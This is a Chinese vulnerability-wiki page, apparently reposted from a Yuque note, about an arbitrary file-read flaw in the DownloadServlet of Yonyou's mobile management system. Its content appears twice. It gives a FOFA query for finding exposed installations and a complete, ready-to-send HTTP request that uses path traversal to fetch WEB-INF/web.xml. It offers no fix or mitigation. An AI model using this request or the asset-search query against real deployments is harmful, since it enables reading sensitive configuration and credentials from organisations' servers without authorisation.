fofamini-wiki

登录白背景

源码

用友移动管理系统DownloadServlet存在任意文件读取漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统DownloadServlet存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

用友移动系统管理系统

三、资产测绘

fofaapp="用友-移动系统管理"
特征

四、漏洞复现

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml HTTP/1.1
Host: xx.xx.xx.xx
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
SL-CE-SUID: 18
Content-Length: 0

原文: https://www.yuque.com/xiaokp7/ocvun2/yfegtwc93hbputyl

# 用友移动管理系统DownloadServlet存在任意文件读取漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统DownloadServlet存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

# 二、影响版本

- 用友移动系统管理系统

# 三、资产测绘

- fofa`app="用友-移动系统管理"`
- 特征

![image.png](./img/zjs-HHLCWCGsLJZh/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-742644.png)

# 四、漏洞复现
```
GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml HTTP/1.1
Host: xx.xx.xx.xx
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
SL-CE-SUID: 18
Content-Length: 0
```
![image.png](./img/zjs-HHLCWCGsLJZh/1700497852854-9b7e6e7c-37b4-4e5d-be0a-f378aac2898b-659838.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yfegtwc93hbputyl>